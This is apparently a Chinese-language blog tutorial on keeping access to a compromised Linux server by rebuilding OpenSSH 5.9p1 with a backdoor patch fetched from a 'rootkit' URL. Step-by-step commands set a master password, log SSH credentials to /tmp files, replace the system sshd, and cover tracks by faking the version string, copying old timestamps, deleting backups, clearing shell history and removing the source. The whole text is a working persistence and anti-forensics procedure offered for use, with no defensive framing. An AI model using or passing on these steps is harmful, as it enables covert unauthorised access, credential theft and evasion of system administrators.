前言
Linux重新编译包含万能密码的SSH实现权限维持
下载依赖
1
2
| yum install gcc gcc-c++ make patch
yum install openssl openssl-devel pam-devel zlib zlib-devel
|
下载 SSH 5.9p1 源码
1
2
| wget https://mirror.aarnet.edu.au/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
tar -xzvf openssh-5.9p1.tar.gz
|
下载补丁
1
2
| wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz
|
为SSH源码打补丁
1
2
3
| cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1
cd openssh-5.9p1
patch < sshbd5.9p1.diff
|
重命名原SSH文件
1
2
3
| mv /usr/sbin/sshd /usr/sbin/sshd.bak
mv /etc/ssh/ssh_config /etc/ssh/ssh_config.bak
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
|
修改新SSH源码
添加万能密码
- 修改
openssh-5.9p1/includes.h文件第179行
openssh-5.9p1/includes.h1
| #define SECRETPW "<password>"
|
修改日志存放目录
- 修改
openssh-5.9p1/includes.h文件第177行,定义别人访问自己的日志记录
openssh-5.9p1/includes.h1
| #define ILOG "/tmp/ilog"
|
- 修改
openssh-5.9p1/includes.h文件第178行,定义自己访问别人的日志记录
openssh-5.9p1/includes.h1
| #define ILOG "/tmp/olog"
|
修改版本与原SSH保持一致
查看原SSH版本
修改配置文件
- 修改
openssh-5.9p1/version.h文件第3行
openssh-5.9p1/version.h1
| #define SSH_VERSION "<version>"
|
编译并安装
1
2
3
| ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
make
make install
|
修改时间戳
1
2
3
| touch -r /usr/sbin/sshd.bak /usr/sbin/sshd
touch -r /etc/ssh/ssh_config.bak /etc/ssh/ssh_config
touch -r /etc/ssh/sshd_config.bak /etc/ssh/sshd_config
|
清理
清理bak文件
1
2
3
| rm /usr/sbin/sshd.bak
rm /etc/ssh/ssh_config.bak
rm /etc/ssh/sshd_config.bak
|
清理shell历史
清理新SSH源码
1
2
| rm -f openssh-5.9p1.tar.gz 0x06-openssh-5.9p1.patch.tar.gz
rm -rf openssh-5.9p1 openssh-5.9p1.patch
|
保持开机自启SSH服务
重启系统生效
完成
参考文献
微信公众号——博文视点Broadview